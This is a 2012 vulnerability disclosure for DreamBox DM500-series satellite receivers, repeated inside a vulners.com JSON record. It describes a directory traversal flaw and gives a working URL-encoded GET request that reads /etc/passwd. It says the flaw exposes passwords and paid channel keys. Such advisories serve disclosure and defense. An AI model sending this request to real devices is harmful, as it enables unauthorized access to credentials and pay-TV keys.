DreamBox DM500(+) Arbitrary File Download Vulnerability
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM500, DM500+, DM500HD and DM500S
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, etc.
Tested on: Linux dreambox 2.6.17-mutant200s
Vulnerability discovered by: k3vin mitnick
website : http://tunisianblackhat.blogspot.com/
exploit :
http://192.168.1.xxx:80/%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
greetz to tunisian blackhat team , tunisia hackspace , partipirate-tunisie.org , wiki.partipirate-tn.org , samychelly , ANSI.tn , fireboy , underhack ,
scraface team , wild_louzir ,ANIS , slim ammamou , haythem el mekki ... and all tunisia hackers
30/01/2012
K3VIN MITNICK - TUNISIAN BLACKHAT-
From: kevinmitnick@live.fr
To: submit@offsec.com
Subject: mutant200s DreamBox Arbitrary File Download Vulnerability
Date: Sun, 29 Jan 2012 23:13:19 +0000
K3VIN MITNICK - TUNISIAN BLACKHAT-
{"id": "SECURITYVULNS:DOC:27678", "bulletinFamily": "software", "title": "FW: mutant200s DreamBox Arbitrary File Download Vulnerability", "description": "\r\n# Exploit Title: mutant200s DreamBox Arbitrary File Download Vulnerability\r\n# Google Dork: \r\n# Date: 30/01 /2012\r\n# Author: k3vin mitnick\r\n# Software Link: \r\n# Version: \r\n# Tested on: \r\n# CVE : \r\n\r\nDreamBox DM500(+) Arbitrary File Download Vulnerability\r\nVendor: Dream Multimedia GmbH\r\nProduct web page: http://www.dream-multimedia-tv.de\r\nAffected version: DM500, DM500+, DM500HD and DM500S\r\nSummary: The Dreambox is a series of Linux-powered\r\nDVB satellite, terrestrial and cable digital television\r\nreceivers (set-top box).\r\nDesc: Dreambox suffers from a file download vulnerability\r\nthru directory traversal with appending the '/' character\r\nin the HTTP GET method of the affected host address. The\r\nattacker can get to sensitive information like paid channel\r\nkeys, usernames, passwords, config and plug-ins info, etc.\r\nTested on: Linux dreambox 2.6.17-mutant200s \r\nVulnerability discovered by: k3vin mitnick \r\nwebsite : http://tunisianblackhat.blogspot.com/\r\nexploit : \r\nhttp://192.168.1.xxx:80/%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd\r\n-----------------------------------------------------\r\ngreetz to tunisian blackhat team , tunisia hackspace , partipirate-tunisie.org , wiki.partipirate-tn.org , samychelly , ANSI.tn , fireboy , underhack , \r\nscraface team , wild_louzir ,ANIS , slim ammamou , haythem el mekki ... and all tunisia hackers \r\n30/01/2012\r\n\r\nK3VIN MITNICK - TUNISIAN BLACKHAT-\r\n\r\n\r\nFrom: kevinmitnick@live.fr\r\nTo: submit@offsec.com\r\nSubject: mutant200s DreamBox Arbitrary File Download Vulnerability\r\nDate: Sun, 29 Jan 2012 23:13:19 +0000\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nK3VIN MITNICK - TUNISIAN BLACKHAT-\r\n ", "published": "2012-02-15T00:00:00", "modified": "2012-02-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27678", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 19, "enchantments": {"score": {"value": 3.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12197"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12197"]}]}, "exploitation": null, "vulnersScore": 3.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645667607}}
